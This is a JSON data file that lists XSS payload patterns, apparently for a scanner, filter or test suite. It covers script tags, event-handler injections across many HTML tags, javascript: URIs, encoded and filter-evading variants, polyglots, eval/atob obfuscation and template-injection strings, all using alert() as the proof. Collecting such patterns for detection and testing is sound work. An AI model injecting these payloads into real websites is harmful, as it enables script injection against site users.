{
  "attack_type": "Cross-Site Scripting (XSS)",
  "severity": "High",
  "description": "XSS patterns for client-side script injection attacks",
  "total_patterns": 183,
  "patterns": [
    "<script>alert('XSS')</script>",
    "<script>alert(1)</script>",
    "<script>alert(document.cookie)</script>",
    "<script>alert(window.location)</script>",
    "<script>alert('Hacked')</script>",
    "<img src=x onerror=alert('XSS')>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert('XSS')>",
    "<iframe src=javascript:alert('XSS')>",
    "<body onload=alert('XSS')>",
    "<img onload=alert(1)>",
    "<img onload=javascript:alert('XSS')>",
    "<body onload=alert(1)>",
    "<body onload=javascript:alert('XSS')>",
    "<input onload=alert(1)>",
    "<input onload=javascript:alert('XSS')>",
    "<div onload=alert(1)>",
    "<div onload=javascript:alert('XSS')>",
    "<svg onload=alert(1)>",
    "<svg onload=javascript:alert('XSS')>",
    "<iframe onload=alert(1)>",
    "<iframe onload=javascript:alert('XSS')>",
    "<form onload=alert(1)>",
    "<form onload=javascript:alert('XSS')>",
    "<img onerror=alert(1)>",
    "<img onerror=javascript:alert('XSS')>",
    "<body onerror=alert(1)>",
    "<body onerror=javascript:alert('XSS')>",
    "<input onerror=alert(1)>",
    "<input onerror=javascript:alert('XSS')>",
    "<div onerror=alert(1)>",
    "<div onerror=javascript:alert('XSS')>",
    "<svg onerror=alert(1)>",
    "<svg onerror=javascript:alert('XSS')>",
    "<iframe onerror=alert(1)>",
    "<iframe onerror=javascript:alert('XSS')>",
    "<form onerror=alert(1)>",
    "<form onerror=javascript:alert('XSS')>",
    "<img onclick=alert(1)>",
    "<img onclick=javascript:alert('XSS')>",
    "<body onclick=alert(1)>",
    "<body onclick=javascript:alert('XSS')>",
    "<input onclick=alert(1)>",
    "<input onclick=javascript:alert('XSS')>",
    "<div onclick=alert(1)>",
    "<div onclick=javascript:alert('XSS')>",
    "<svg onclick=alert(1)>",
    "<svg onclick=javascript:alert('XSS')>",
    "<iframe onclick=alert(1)>",
    "<iframe onclick=javascript:alert('XSS')>",
    "<form onclick=alert(1)>",
    "<form onclick=javascript:alert('XSS')>",
    "<img onmouseover=alert(1)>",
    "<img onmouseover=javascript:alert('XSS')>",
    "<body onmouseover=alert(1)>",
    "<body onmouseover=javascript:alert('XSS')>",
    "<input onmouseover=alert(1)>",
    "<input onmouseover=javascript:alert('XSS')>",
    "<div onmouseover=alert(1)>",
    "<div onmouseover=javascript:alert('XSS')>",
    "<svg onmouseover=alert(1)>",
    "<svg onmouseover=javascript:alert('XSS')>",
    "<iframe onmouseover=alert(1)>",
    "<iframe onmouseover=javascript:alert('XSS')>",
    "<form onmouseover=alert(1)>",
    "<form onmouseover=javascript:alert('XSS')>",
    "<img onfocus=alert(1)>",
    "<img onfocus=javascript:alert('XSS')>",
    "<body onfocus=alert(1)>",
    "<body onfocus=javascript:alert('XSS')>",
    "<input onfocus=alert(1)>",
    "<input onfocus=javascript:alert('XSS')>",
    "<div onfocus=alert(1)>",
    "<div onfocus=javascript:alert('XSS')>",
    "<svg onfocus=alert(1)>",
    "<svg onfocus=javascript:alert('XSS')>",
    "<iframe onfocus=alert(1)>",
    "<iframe onfocus=javascript:alert('XSS')>",
    "<form onfocus=alert(1)>",
    "<form onfocus=javascript:alert('XSS')>",
    "<img onblur=alert(1)>",
    "<img onblur=javascript:alert('XSS')>",
    "<body onblur=alert(1)>",
    "<body onblur=javascript:alert('XSS')>",
    "<input onblur=alert(1)>",
    "<input onblur=javascript:alert('XSS')>",
    "<div onblur=alert(1)>",
    "<div onblur=javascript:alert('XSS')>",
    "<svg onblur=alert(1)>",
    "<svg onblur=javascript:alert('XSS')>",
    "<iframe onblur=alert(1)>",
    "<iframe onblur=javascript:alert('XSS')>",
    "<form onblur=alert(1)>",
    "<form onblur=javascript:alert('XSS')>",
    "<img onchange=alert(1)>",
    "<img onchange=javascript:alert('XSS')>",
    "<body onchange=alert(1)>",
    "<body onchange=javascript:alert('XSS')>",
    "<input onchange=alert(1)>",
    "<input onchange=javascript:alert('XSS')>",
    "<div onchange=alert(1)>",
    "<div onchange=javascript:alert('XSS')>",
    "<svg onchange=alert(1)>",
    "<svg onchange=javascript:alert('XSS')>",
    "<iframe onchange=alert(1)>",
    "<iframe onchange=javascript:alert('XSS')>",
    "<form onchange=alert(1)>",
    "<form onchange=javascript:alert('XSS')>",
    "<img onsubmit=alert(1)>",
    "<img onsubmit=javascript:alert('XSS')>",
    "<body onsubmit=alert(1)>",
    "<body onsubmit=javascript:alert('XSS')>",
    "<input onsubmit=alert(1)>",
    "<input onsubmit=javascript:alert('XSS')>",
    "<div onsubmit=alert(1)>",
    "<div onsubmit=javascript:alert('XSS')>",
    "<svg onsubmit=alert(1)>",
    "<svg onsubmit=javascript:alert('XSS')>",
    "<iframe onsubmit=alert(1)>",
    "<iframe onsubmit=javascript:alert('XSS')>",
    "<form onsubmit=alert(1)>",
    "<form onsubmit=javascript:alert('XSS')>",
    "javascript:alert('XSS')",
    "javascript:alert(1)",
    "javascript:alert(document.domain)",
    "javascript:void(0)",
    "javascript:eval('alert(1)')",
    "jAvAsCrIpT:alert(1)",
    "j&#97;vascript:alert(1)",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
    "&lt;script&gt;alert('XSS')&lt;/script&gt;",
    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
    "<scr<script>ipt>alert(1)</script>",
    "<scr\u0000ipt>alert(1)</script>",
    "<scr\nipt>alert(1)</script>",
    "%253Cscript%253Ealert(1)%253C/script%253E",
    "&#x26;lt;script&#x26;gt;alert(1)",
    "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e",
    "\" onload=\"alert(1)",
    "' onload='alert(1)",
    "\" onclick=\"alert(1)\" \"",
    "' onclick='alert(1)' '",
    "\" autofocus onfocus=\"alert(1)",
    "\" style=\"x:expression(alert(1))",
    "\" src=\"javascript:alert(1)",
    "<svg><script>alert(1)</script></svg>",
    "<svg onload=alert(1)>",
    "<svg/onload=alert('XSS')>",
    "<svg><animate onbegin=alert(1)>",
    "<svg><set onbegin=alert(1)>",
    "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//></stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>",
    "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
    "<img src=1 onerror=eval(atob('YWxlcnQoMSk='))>",
    "<img src=1 onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>",
    "<iframe src=data:text/html,<script>alert(1)</script>>",
    "<object data=data:text/html,<script>alert(1)</script>>",
    "<embed src=data:text/html,<script>alert(1)</script>>",
    "<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">",
    "<form><button formaction=javascript:alert(1)>XSS</button>",
    "<input onfocus=alert(1) autofocus>",
    "<select onfocus=alert(1) autofocus>",
    "<textarea onfocus=alert(1) autofocus>",
    "{{alert(1)}}",
    "${alert(1)}",
    "#{alert(1)}",
    "{{constructor.constructor('alert(1)')()}}",
    "${constructor.constructor('alert(1)')()}",
    "<scr<script>ipt>alert(1)</script>",
    "<img src=x:alert(1) onerror=eval(src)>",
    "<img src=x:eval(unescape('%61%6c%65%72%74%28%31%29'))>",
    "<img src onerror=&#97&#108&#101&#114&#116(1)>",
    "<iframe srcdoc='<script>alert(1)</script>'>",
    "<marquee onstart=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<video src=x onerror=alert(1)>",
    "<audio src=x onerror=alert(1)>",
    "<style>@import'javascript:alert(1)';</style>",
    "<link rel=import href=data:text/html,<script>alert(1)</script>>",
    "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">",
    "<form action=javascript:alert(1)><input type=submit>",
    "<isindex action=javascript:alert(1)>",
    "<table background=javascript:alert(1)>"
  ]
}